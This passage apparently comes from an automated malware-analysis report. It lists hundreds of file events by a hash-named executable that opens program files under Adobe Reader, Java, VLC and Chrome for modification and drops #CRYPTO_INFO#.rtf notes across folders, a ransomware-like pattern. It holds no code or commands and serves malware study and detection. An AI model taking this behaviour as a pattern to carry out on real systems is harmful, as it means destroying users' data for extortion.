(x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_preferencestyle.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Windows Mail\wab.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files-select\js\plugin.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.httpcomponents.httpclient_4.2.6.v201311072007.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\az_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\flags.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\Toast.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\themes\dark\rhp_world_icon_2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\UnregisterRequest.mpeg3 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\core\com-sun-tools-visualvm-modules-startup.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\it-it\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-core.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sl-si\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themeless\S_ThumbDownOutline_22_N1.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\warning.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\sendforcomments.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\cs-cz\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\fr-fr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\new_icons_retina.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\sunec.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans_1.2.200.v20140214-0004.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_export_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\nl-nl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\it-it\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\dark\core_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\wsimport.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\root\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\hu-hu\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ja-jp\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\en-ae\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk_1.0.300.v20140407-1803.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.osgi.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\apple-touch-icon-144x144-precomposed.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_zh_tw_135x40.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\nl-nl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-attach.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\sk-sk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\rhp_world_icon.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileAcrobatCard_Dark.pdf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-core-kit.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\core\locale\core_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\delete.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\tr-tr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\nl-nl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\info.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\zh-tw\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\tr-tr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\hu-hu\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\sl-si\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\diagnostic-command-16.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.text_3.5.300.v20130515-1451.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.core.di_1.4.0.v20140414-1837.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_it.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\ECLIPSE_.RSA 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ru-ru\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\sign-in.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-high-contrast.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\home-view\selector.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\arrow-left.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\selection-actions2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\sk-sk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sk-sk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\css\main.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_backarrow_default.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-gb\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\nl_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\configuration\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\en-il\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\sv-se\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css\blafdoc.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jmx_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\illustrations_retina.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\en-ae\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\pl-pl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.ui.zh_CN_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.configuration_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_ja.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jetty.io_8.1.14.v20131031.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Installer\setup.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\plugins\rhp\createpdfupsell-app-tool-view.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\es-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\theme-2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\VERSION.txt 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\themes\dark\new_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\sv-se\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\en-gb\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program 